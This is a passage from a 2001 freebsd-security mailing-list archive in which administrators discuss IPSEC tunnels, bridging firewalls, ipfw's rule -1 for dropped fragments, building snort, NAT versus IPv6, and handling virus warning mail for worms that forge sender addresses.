FreeBSD, which allows you to set up a machine that has NO IP address (it
is like a sort of HUB) and still have a firewall configured on it (see
the mail archive less than 5 days ago). That way you avoid routing
problems, and I believe the machine is even more secure as it is
invisible from the Internet. Of course you need a switch to serve your 3
servers.

Olivier



From owner-freebsd-security  Tue Mar 13 20:43:52 2001
Delivered-To: freebsd-security@freebsd.org
Received: from shorty.ahpcns.com (joemoore-host.dsl.visi.com [209.98.246.61])
	by hub.freebsd.org (Postfix) with ESMTP id 36FAC37B719
	for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 20:43:50 -0800 (PST)
	(envelope-from jomor@ahpcns.com)
Received: from ahpcns.com (localhost [127.0.0.1])
	by shorty.ahpcns.com (Postfix) with ESMTP id 2958A3A715
	for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 22:43:47 -0600 (CST)
Message-ID: <3AAEF702.9AC2715B@ahpcns.com>
Date: Tue, 13 Mar 2001 22:43:46 -0600
From: jomor <jomor@ahpcns.com>
Organization: ahpcns
X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 3.5-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: IPSEC tunnel without gif?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I've been setting up a VPN with tunnel mode IPSEC and things are going
OK so far but in searching the list archives, I've found some stuff that
seems to imply that gif tunnels are not needed for tunnel mode. Is this
true? I've only gotten it to work by pre-configuring the gif tunnel, but
now I'm not sure if I have true "tunnel mode IPSEC" or "transport mode
IPSEC" applied to an "IP-ENCAP" tunnel such as that suggested by the
X-bone project.

                        seeking enlightenment    ...jgm




From owner-freebsd-security  Tue Mar 13 20:52:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19])
	by hub.freebsd.org (Postfix) with ESMTP id 3E62537B719
	for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 20:52:15 -0800 (PST)
	(envelope-from durham@w2xo.pgh.pa.us)
Received: from shazam (shazam [192.168.5.3])
	by w2xo.pgh.pa.us (8.11.2/8.9.3) with ESMTP id f2E4pcq41853
	for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 04:51:39 GMT
	(envelope-from durham@w2xo.pgh.pa.us)
Date: Tue, 13 Mar 2001 23:54:01 -0500 (EST)
From: Jim Durham <durham@w2xo.pgh.pa.us>
X-Sender: durham@shazam.int
To: freebsd-security@freebsd.org
Subject: Sophos and Virus return mail
Message-ID: <Pine.BSF.4.21.0103132338550.27904-100000@shazam.int>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Great discussion going on about Sophos and Amavis!

This may be something I'm missing, but there are several
virii that apparently send no "envelope from" address when
they generate virus mail. One that comes to mind is the
stupid "Snow White" thing.

I went through the Amavis scan script and I see that if
there is no "envelope from" address, it punts and sends
the warning to "MAILER-DAEMON". This means you get a
bazillion of these messages every day (We seem to have
employees who appear in the address books of people with
this virus!). Also, the person with the virus does not
get the warning mail. 

I thought of rewriting the script to use the "From: " address
to reply. I think that would usually work, but I'm not sure
that address always appears either.

Anyone done anything with this?

Thanks,

Jim Durham






From owner-freebsd-security  Tue Mar 13 20:57: 6 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.xmission.com (mail.xmission.com [198.60.22.22])
	by hub.freebsd.org (Postfix) with ESMTP id DCA1F37B71A
	for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 20:57:04 -0800 (PST)
	(envelope-from cookfire@xmission.com)
Received: from [166.70.183.163] (helo=cook)
	by mail.xmission.com with smtp (Exim 3.12 #1)
	id 14d3LM-0003NU-00
	for freebsd-security@freebsd.org; Tue, 13 Mar 2001 21:57:04 -0700
Reply-To: <cookfire@xmission.com>
From: "Craig Chaney" <cookfire@xmission.com>
To: <freebsd-security@freebsd.org>
Subject: Bridging only 2 interfaces???
Date: Tue, 13 Mar 2001 21:57:35 -0700
Message-ID: <001501c0ac43$49dcfe60$a3b746a6@cook>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I have set up a bridging firewall that has 3 interfaces. One of the
interfaces is the protected side of the machine, one is the internet side of
the machine, and the third is an interface in to my local network for
management purposes. Is it possible to set up the machine to bridge just the
interfaces not connected to the local network? If so how?

Thank you

--Craig




From owner-freebsd-security  Tue Mar 13 22:37:59 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.freebsd-corp-net-guide.com (mail.freebsd-corp-net-guide.com [206.29.169.15])
	by hub.freebsd.org (Postfix) with ESMTP
	id 164B237B71A; Tue, 13 Mar 2001 22:37:48 -0800 (PST)
	(envelope-from tedm@toybox.placo.com)
Received: from tedm.placo.com (nat-rtr.freebsd-corp-net-guide.com [206.29.168.154])
	by mail.freebsd-corp-net-guide.com (8.11.1/8.11.1) with SMTP id f2E6ZDN22442;
	Tue, 13 Mar 2001 22:35:13 -0800 (PST)
	(envelope-from tedm@toybox.placo.com)
From: "Ted Mittelstaedt" <tedm@toybox.placo.com>
To: "Bob Van Valzah" <Bob@Talarian.Com>
Cc: "pW" <packetwhore@stargate.net>, <FreeBSD-Security@FreeBSD.ORG>,
	<FreeBSD-Questions@FreeBSD.ORG>
Subject: RE: Racoon Problem & Cisco Tunnel
Date: Tue, 13 Mar 2001 22:35:12 -0800
Message-ID: <003d01c0ac50$ec379280$1401a8c0@tedm.placo.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0
Importance: Normal
In-Reply-To: <3AAE24E6.9080802@Talarian.Com>
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Thanks!

It's not really a religious war, because there's valid reasons
to move to IPv6 and I think it's obvious that ultimately the
Internet is going to have to go there.  But, what the engineers
don't understand is that this is a political problem, not a
technical problem.  They just see it like the Post Office sees
it when they need a new zip code.  What they always forget is
that there's ways to twist the arms of people that are address
space hogs that will force those addresses to be upchucked - thus
the "imminent shortage" magically disappears for another 6
months until the next person's arm needs to be twisted.  And,
there's an incredible number of arms out there that can be twisted.

Take some of those large corporations, like SquishySoft, that
have entire class A's assigned to them, but firewall the entire
address space off from the public Internet, and only allow
incoming connections to perhaps 100 of them.  Would you like
to be the CEO of Squishy when the papers start rolling the story
of how this company's completely unjustified hanging-on of this
block is preventing another 16 million people from being brought
on to the Internet?

I agree with you on ISP's needing to hand out public numbers.
The ISP I work for hands them out with every account, either
work or home, for no extra charge.  As long as you know what
you're doing when you put together your network it's not a problem
for the ISP.  I've even been known to cut the occasional /29 subnet
to people that had justification for it.  I only draw the line at
the people that want a dozen numbers in the DSL bridge itself and
are too cheap to buy a router.  But, going beyond a /29 for a
small company - that's a different story, and we make people jump
through hoops before doing it.


Ted Mittelstaedt                      tedm@toybox.placo.com
Author of:          The FreeBSD Corporate Networker's Guide
Book website:         http://www.freebsd-corp-net-guide.com


-----Original Message-----
From: Bob Van Valzah [mailto:Bob@Talarian.Com]
Sent: Tuesday, March 13, 2001 5:47 AM
To: Ted Mittelstaedt
Cc: pW; FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG
Subject: Re: Racoon Problem & Cisco Tunnel


Ted, Loved the book--can't wait for the movie!

This is a religious war that's been fought many times before. Since my last
answer was too flip, I'll clarify my point of view. IPv4, IPv6, and NAT are
all just tools that I have to apply with "business sense." NAT's not
inherently evil, nor is IPv6. Their sensibility will change over time and
depend upon the application.

If I were shopping for DSL for "my mom," I wouldn't care if she got a public
address or not. Reliability and good support (as a "little guy" can more
often provide) would be more important.

But when I'm shopping for DSL for a work-from-home, multicast protocol stack
developer, a public address is a requirement. In fact, it's something I'll
pay extra to get. For my business, IPSec is important and hence having at
least one public address is important.

My protocol developers have a few LANs at home and we happily use NAT there.
I wouldn't pay extra to get enough address space to put public addresses on
all their home lab machines.

An ISP who won't give me at least one public address is just limiting where
I can apply their service. An ISP who gives me one or more public addresses
lets me pick the point at which I want to apply NAT.

So in spite of my flip remarks, I hope you can see that I do use NAT--I just
put it off to the last minute where it doesn't make business sense to avoid
it.

   Bob

Ted Mittelstaedt wrote:

-----Original Message-----
From: owner-freebsd-questions@FreeBSD.ORG
[mailto:owner-freebsd-questions@FreeBSD.ORG] On Behalf Of Bob Van Valzah
Sent: Monday, March 12, 2001 8:07 AM
To: pW
Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG
Subject: Re: Racoon Problem & Cisco Tunnel

Yes. The five DSL setups with which I'm familiar all grant at least one
public address per house. I believe all are static, but one might be
dynamic. Interference with protocols like IPSec is one of the reasons
why I'd make a public address a requirement when choosing a DSL
provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all
possible. Let's hasten the deployment of IPv6.

I'd agree with you if everyone that would have to do a renumber of a
large network from IPv4 to IPv6 had Vint Cerf's money.  When you're
retired like him with money coming out your arse-hole you can afford to
make irresponsible statements like that.

Unfortunately, what people like him don't understand is that the burden
of renumbering the fabric of the Internet from IPv4 to IPv6 will fall
largely on people like me - who have thousands of customers and tens of
thousands of public IP numbers spread out among all of them - and who
don't have the money to support something this audacious.  I can almost
guarantee that whatever ISP that I am working for when this finally
happens is going to go out of business, all it's going to do is put
thousands of smaller to medium-sized ISP's into bankruptcy and let
people like AOL who have money coming out their arse-holes virtually
monopolize Internet access in the world.

Until I see the large organizations with Class A's tied up, give up
those numbers back to the pool, I'll fight any attempt to move from IPv4
to IPv6, and most other ISP's that are out there are going to fight it
as well.  In the meantime I'm pushing all my customers into using NAT.
NAT is here to stay and people that run around calling it an aberration
are just proving to the rest of us that they have absolutely no business
sense.

NAT has proven itself reliable and vital and idiot engineers that design
TCP protocols that assume everyone has a public IP number are just
architecting their own failures, and their protocol's subsequent
minimizing by the market.  I have some sympathy for protocols like IPSec
that came to be during the same time - but
organizational-to-organizational IPSec tunnels don't have to pass
through the NAT - they can terminate on it.  But, anyone doing a new
protocol today is a fool if it can't work through a NAT.

Ted Mittelstaedt                      tedm@toybox.placo.com
Author of:          The FreeBSD Corporate Networker's Guide
Book website:         http://www.freebsd-corp-net-guide.com


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Mar 13 23:20:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82])
	by hub.freebsd.org (Postfix) with ESMTP id 07D6137B71B
	for <security@freebsd.org>; Tue, 13 Mar 2001 23:20:17 -0800 (PST)
	(envelope-from cjc@rfx-216-196-73-168.users.reflexcom.com)
Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net  with Microsoft SMTPSVC(5.5.1877.197.19);
	 Tue, 13 Mar 2001 23:18:15 -0800
Received: (from cjc@localhost)
	by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f2E7KFh11046;
	Tue, 13 Mar 2001 23:20:15 -0800 (PST)
	(envelope-from cjc)
Date: Tue, 13 Mar 2001 23:20:14 -0800
From: "Crist J. Clark" <cjclark@reflexnet.net>
To: Alan Batie <alan@batie.org>
Cc: security@FreeBSD.ORG
Subject: Re: ipfw rule -1?
Message-ID: <20010313232014.B496@cjc-desktop.users.reflexcom.com>
Reply-To: cjclark@alum.mit.edu
References: <20010313084020.A5859@agora.rdrop.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010313084020.A5859@agora.rdrop.com>; from alan@batie.org on Tue, Mar 13, 2001 at 08:40:20AM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Mar 13, 2001 at 08:40:20AM -0800, Alan Batie wrote:
> I'm seeing a few of these in my ipfw log and was wondering what rule -1 is?  
> I couldn't find anything about it in the man page...
> 
> > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > ipfw: -1 Refuse TCP 62.29.124.91:97 199.2.210.241:29540 in via etha16
> > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16

The manpage does not go as far as to indicate that this is rule -1,
but it does say this happens,

  FINE POINTS
       o   There is one kind of packet that the firewall will always discard,
           that is a TCP packet's fragment with a fragment offset of one.  This
           is a valid packet, but it only has one use, to try to circumvent
           firewalls.

Rule -1 is given for any packet dropped, but not dropped due to a user
rule or the default rule. A quick look at the source indicates the
above pseudo-rule and some other fragment issues (bogusfrag) are the
only such situations. 

OK, I've answered this one enough times now. Should I send in a PR
with patch to the manpage or is this for the FAQ?
-- 
Crist J. Clark                           cjclark@alum.mit.edu



From owner-freebsd-security  Tue Mar 13 23:29:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from awww.jeah.net (awww.jeah.net [216.111.239.130])
	by hub.freebsd.org (Postfix) with ESMTP id A330437B719
	for <security@FreeBSD.ORG>; Tue, 13 Mar 2001 23:29:12 -0800 (PST)
	(envelope-from chris@jeah.net)
Received: from localhost (chris@localhost)
	by awww.jeah.net (8.11.1/8.11.0) with ESMTP id f2E7T0c08415;
	Wed, 14 Mar 2001 01:29:00 -0600 (CST)
	(envelope-from chris@jeah.net)
Date: Wed, 14 Mar 2001 01:28:59 -0600 (CST)
From: Chris Byrnes <chris@jeah.net>
To: <cjclark@alum.mit.edu>
Cc: Alan Batie <alan@batie.org>, <security@FreeBSD.ORG>
Subject: Re: ipfw rule -1?
In-Reply-To: <20010313232014.B496@cjc-desktop.users.reflexcom.com>
Message-ID: <Pine.BSF.4.33.0103140128330.8348-100000@awww.jeah.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I think it'd be nice to see it in the manpage right underneath the "Fine
Point" you pasted.


+ Chris Byrnes, chris@JEAH.net
 + JEAH Communications
  + 1-866-AWW-JEAH (Toll-Free)


On Tue, 13 Mar 2001, Crist J. Clark wrote:

> On Tue, Mar 13, 2001 at 08:40:20AM -0800, Alan Batie wrote:
> > I'm seeing a few of these in my ipfw log and was wondering what rule -1 is?
> > I couldn't find anything about it in the man page...
> >
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:97 199.2.210.241:29540 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
>
> The manpage does not go as far as to indicate that this is rule -1,
> but it does say this happens,
>
>   FINE POINTS
>        o   There is one kind of packet that the firewall will always discard,
>            that is a TCP packet's fragment with a fragment offset of one.  This
>            is a valid packet, but it only has one use, to try to circumvent
>            firewalls.
>
> Rule -1 is given for any packet dropped, but not dropped due to a user
> rule or the default rule. A quick look at the source indicates the
> above pseudo-rule and some other fragment issues (bogusfrag) are the
> only such situations.
>
> OK, I've answered this one enough times now. Should I send in a PR
> with patch to the manpage or is this for the FAQ?
> --
> Crist J. Clark                           cjclark@alum.mit.edu
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>




From owner-freebsd-security  Tue Mar 13 23:32:27 2001
Delivered-To: freebsd-security@freebsd.org
Received: from castle.dreaming.org (castle.dreaming.org [216.221.214.170])
	by hub.freebsd.org (Postfix) with ESMTP
	id DDEB137B718; Tue, 13 Mar 2001 23:32:11 -0800 (PST)
	(envelope-from mit@mitayai.net)
Received: (from root@localhost)
	by castle.dreaming.org (8.11.2/8.11.2) id f2E7WBx78903;
	Wed, 14 Mar 2001 02:32:11 -0500 (EST)
	(envelope-from mit@mitayai.net)
Received: from cr592943a (cr592943-a.bloor1.on.wave.home.com [24.156.38.199])
	by castle.dreaming.org (8.11.2/8.11.2av) with SMTP id f2E7W9t78895;
	Wed, 14 Mar 2001 02:32:09 -0500 (EST)
	(envelope-from mit@mitayai.net)
From: "Will Mitayai Keeso Rowe" <mit@mitayai.net>
To: <freebsd-ports@freebsd.org>
Cc: <freebsd-security@freebsd.org>
Subject: RE: ICMP attacks
Date: Wed, 14 Mar 2001 02:29:17 -0500
Message-ID: <NEBBIEGPMLMKDBMMICFNAECNEMAA.mit@mitayai.net>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: <980521178.3a7190da7ba07@mail.marketnews.com>
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Importance: Normal
X-Virus-Scanned: by AMaViS perl-10
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

i'd love to use snort, but i keep getting this:

[castle:root]/usr/ports/security/snort# make -DWITH_MYSQL=yes clean install
===>  Cleaning for snort-1.7
===>  Extracting for snort-1.7
>> Checksum OK for snort-1.7.tar.gz.

gzip: stdout: Broken pipe
===>  Patching for snort-1.7
===>  Configuring for snort-1.7



:-----Original Message-----
:From: owner-freebsd-security@FreeBSD.ORG
:[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of
:mharding@marketnews.com
:Sent: January 26, 2001 10:00 AM
:To: Will Mitayai Keeso Rowe
:Cc: freebsd-security@FreeBSD.ORG
:Subject: Re: ICMP attacks
:
:
:Try using a Intrusion detection system.  Snort works well for me.  
:If this is 
:just a port scan it will show a lot of different attack warnings as the 
:different ports are hit, but it will show what IP is doing it.
:
:Mason
:
:Quoting Will Mitayai Keeso Rowe <mit@mitayai.net>:
:
:> > icmp-response bandwidth limit 205/200 pps
:> > icmp-response bandwidth limit 264/200 pps
:> > icmp-response bandwidth limit 269/200 pps
:> > icmp-response bandwidth limit 273/200 pps
:> > icmp-response bandwidth limit 273/200 pps
:> > icmp-response bandwidth limit 271/200 pps
:> > icmp-response bandwidth limit 261/200 pps
:> > icmp-response bandwidth limit 268/200 pps
:> > icmp-response bandwidth limit 205/200 pps
:> > icmp-response bandwidth limit 223/200 pps
:> 
:> Is there any way to trace the people that are causing this? It's
:> becoming a
:> daily occurrence and it's beginning to irritate me.
:> 
:> -Mit
:> 
:> 
:> 
:> 
:> 
:> To Unsubscribe: send mail to majordomo@FreeBSD.org
:> with "unsubscribe freebsd-security" in the body of the message
:> 
:
:
:To Unsubscribe: send mail to majordomo@FreeBSD.org
:with "unsubscribe freebsd-security" in the body of the message
:
:



From owner-freebsd-security  Tue Mar 13 23:42: 0 2001
Delivered-To: freebsd-security@freebsd.org
Received: from luke.macfat.dk (port3.ds1-taa.adsl.cybercity.dk [212.242.189.68])
	by hub.freebsd.org (Postfix) with ESMTP id 0A59137B719
	for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 23:41:53 -0800 (PST)
	(envelope-from macfat@macfat.dk)
Received: by luke.macfat.dk (Postfix, from userid 1001)
	id CDFED55416; Wed, 14 Mar 2001 08:41:51 +0100 (CET)
Date: Wed, 14 Mar 2001 08:41:51 +0100
From: Rene Pedersen <freebsd@macfat.dk>
To: Craig Chaney <cookfire@xmission.com>
Cc: freebsd-security@freebsd.org
Subject: Re: Bridging only 2 interfaces???
Message-ID: <20010314084151.A93208@luke.macfat.dk>
References: <001501c0ac43$49dcfe60$a3b746a6@cook>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <001501c0ac43$49dcfe60$a3b746a6@cook>; from cookfire@xmission.com on Tue, Mar 13, 2001 at 09:57:35PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Mar 13, 2001 at 09:57:35PM -0700, Craig Chaney wrote:
> I have set up a bridging firewall that has 3 interfaces. One of the
> interfaces is the protected side of the machine, one is the internet side of
> the machine, and the third is an interface in to my local network for
> management purposes. Is it possible to set up the machine to bridge just the
> interfaces not connected to the local network? If so how?

You should have a look at the sysctl net.link.ether.bridge_cfg, where you can
define which interfaces are bridged.

e.g.: sysctl -w net.link.ether.bridge_cfg=fxp0:1,fxp1:1,fxp2:0
which will bridge on fxp0 and fxp1 but not fxp2

// Rene

-- 
Micro$oft is not the answer, Micro$oft is the question, the answer is no.



From owner-freebsd-security  Wed Mar 14  0:26: 0 2001
Delivered-To: freebsd-security@freebsd.org
Received: from hotmail.com (f155.law7.hotmail.com [216.33.237.155])
	by hub.freebsd.org (Postfix) with ESMTP id 02B8437B718
	for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 00:25:57 -0800 (PST)
	(envelope-from ntvsunix@hotmail.com)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 14 Mar 2001 00:25:56 -0800
Received: from 209.53.55.186 by lw7fd.law7.hotmail.msn.com with HTTP;	Wed, 14 Mar 2001 08:25:56 GMT
X-Originating-IP: [209.53.55.186]
From: "Some Person" <ntvsunix@hotmail.com>
To: cookfire@xmission.com, freebsd-security@freebsd.org
Subject: Re: Bridging only 2 interfaces???
Date: Wed, 14 Mar 2001 08:25:56 
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F1550yA0FojonDUmeRX00008f27@hotmail.com>
X-OriginalArrivalTime: 14 Mar 2001 08:25:56.0750 (UTC) FILETIME=[646432E0:01C0AC60]
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I've never done that on FreeBSD (yet), but I do exactly that, with three NICs 
on OpenBSD 2.8. I'm sure it's just as easily possible with FreeBSD using 
IPFW...

IPF on OpenBSD would change the ruleset completely on the 'bridged' 
interface/rules file.

It's a little tricky at first, but then very easy once you get the concept. 
And not to forget that the (non-bridged) interface (if you decided to use 
rules, is to use the normal rule processing and not the contrary for the 
bridged interfaces).

Not trying to push you away from FreeBSD, just trying to help where I can...

Best Regards!

FreeBSD/OpenBSD - Advocate!

>
>I have set up a bridging firewall that has 3 interfaces. One of the
>interfaces is the protected side of the machine, one is the internet side 
>of
>the machine, and the third is an interface in to my local network for
>management purposes. Is it possible to set up the machine to bridge just 
>the
>interfaces not connected to the local network? If so how?
>
>Thank you
>
>--Craig
>
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message





From owner-freebsd-security  Wed Mar 14  0:31:45 2001
Delivered-To: freebsd-security@freebsd.org
Received: from hotmail.com (f113.law7.hotmail.com [216.33.237.113])
	by hub.freebsd.org (Postfix) with ESMTP id 2299237B71B
	for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 00:31:41 -0800 (PST)
	(envelope-from ntvsunix@hotmail.com)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 14 Mar 2001 00:31:41 -0800
Received: from 209.53.55.186 by lw7fd.law7.hotmail.msn.com with HTTP;	Wed, 14 Mar 2001 08:31:40 GMT
X-Originating-IP: [209.53.55.186]
From: "Some Person" <ntvsunix@hotmail.com>
To: freebsd-security@freebsd.org
Subject: Re: Bridging only 2 interfaces???
Date: Wed, 14 Mar 2001 08:31:40 
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F113LSAQV6uPDVniSnR0001b7d3@hotmail.com>
X-OriginalArrivalTime: 14 Mar 2001 08:31:41.0013 (UTC) FILETIME=[31969050:01C0AC61]
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Speaking of that, is it still not possible to filter bridged frames on 
FreeBSD with IPF?

Personally IPF is my preferred choice over IPFW, although of course IPFW does 
have DUMMYNET.. :)

Dunno if that's been changed yet, or if there's any plans for it?

In the meanwhile, I've opted for OpenBSD and to be honest, I love it and 
haven't seen any performance penalty at all...

I use FreeBSD for all other things too, but think would be kewl to have this 
in FreeBSD as well...

Thanks.

>
>On Tue, Mar 13, 2001 at 09:57:35PM -0700, Craig Chaney wrote:
> > I have set up a bridging firewall that has 3 interfaces. One of the
> > interfaces is the protected side of the machine, one is the internet 
>side of
> > the machine, and the third is an interface in to my local network for
> > management purposes. Is it possible to set up the machine to bridge just 
>the
> > interfaces not connected to the local network? If so how?
>
>You should have a look at sysctl net.link.ether.bridge_cfg where you can 
>define which interfaces that are bridged
>
>eg: sysctl -w net.link.ether.bridge_cfg: fxp0:1,fxp1:1,fxp2:0,
>which will bridge on fxp0 and fxp1 but not fxp2
>
>// Rene
>
>--
>Micro$oft is not the answer, Micro$oft is the question, the answer is no.
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message





From owner-freebsd-security  Wed Mar 14  0:47:37 2001
Delivered-To: freebsd-security@freebsd.org
Received: from agora.rdrop.com (agora.rdrop.com [199.2.210.241])
	by hub.freebsd.org (Postfix) with ESMTP id 4791837B718
	for <security@FreeBSD.ORG>; Wed, 14 Mar 2001 00:47:35 -0800 (PST)
	(envelope-from alan@agora.rdrop.com)
Received: (from alan@localhost)
	by agora.rdrop.com (8.11.1/8.11.1) id f2E8mCg01662;
	Wed, 14 Mar 2001 00:48:12 -0800 (PST)
Date: Wed, 14 Mar 2001 00:48:12 -0800
From: Alan Batie <alan@batie.org>
To: Chris Byrnes <chris@jeah.net>
Cc: cjclark@alum.mit.edu, security@FreeBSD.ORG
Subject: Re: ipfw rule -1?
Message-ID: <20010314004812.A1528@agora.rdrop.com>
Mail-Followup-To: Chris Byrnes <chris@jeah.net>,
	cjclark@alum.mit.edu, security@FreeBSD.ORG
References: <20010313232014.B496@cjc-desktop.users.reflexcom.com> <Pine.BSF.4.33.0103140128330.8348-100000@awww.jeah.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <Pine.BSF.4.33.0103140128330.8348-100000@awww.jeah.net>; from chris@jeah.net on Wed, Mar 14, 2001 at 01:28:59AM -0600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Mar 14, 2001 at 01:28:59AM -0600, Chris Byrnes wrote:
> I think it'd be nice to see it in the manpage right underneath the "Fine
> Point" you pasted.

I agree, as there's no indication from the ipfw log that it was that case
that triggered it.

-- 
Alan Batie                   ______    www.rdrop.com/users/alan      Me
alan@batie.org               \    /    www.qrd.org         The Triangle
PGPFP DE 3C 29 17 C0 49 7A    \  /     www.pgpi.com   The Weird Numbers
27 40 A5 3C 37 4A DA 52 B9     \/      www.anti-spam.net       NO SPAM!



From owner-freebsd-security  Wed Mar 14  5: 8:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mgateway.borderware.com (mgateway.borderware.com [207.236.65.231])
	by hub.freebsd.org (Postfix) with ESMTP id 4979B37B71A
	for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 05:08:19 -0800 (PST)
	(envelope-from bmw@borderware.com)
From: "Bruce M. Walker" <bmw@borderware.com>
Message-Id: <200103141308.f2ED84E11909@fusion.borderware.com>
Subject: Re: Sophos and Virus return mail
In-Reply-To: <Pine.BSF.4.21.0103132338550.27904-100000@shazam.int> from Jim Durham
 at "Mar 13, 2001 11:54:01 pm"
To: Jim Durham <durham@w2xo.pgh.pa.us>
Date: Wed, 14 Mar 2001 08:08:04 -0500 (EST)
Cc: freebsd-security@freebsd.org
X-Mailer: ELM [version 2.4ME+ PL66 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Jim Durham wrote:
> 
> I thought of rewriting the script to use the "From: " address
> to reply. I think that would usually work, but I'm not sure
> that address always appears either.

Unhappily not:

  From: Hahaha <hahaha@sexyfun.net>

You can see the IP of the host that sent it to you in the Received:
headers if you inspect them, but that will be simply the Windows
PC that itself has been infected.  Snowhite contains a complete
SMTP send-only implementation and it delivers to its targets directly.

I'm afraid you're stuck with these things.

(This is one case where blocking of port 25 by ISPs is a good thing.)

-bmw



From owner-freebsd-security  Wed Mar 14  5:27:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21])
	by hub.freebsd.org (Postfix) with ESMTP id 4C1E637B71A
	for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 05:27:39 -0800 (PST)
	(envelope-from rjh@mohawk.net)
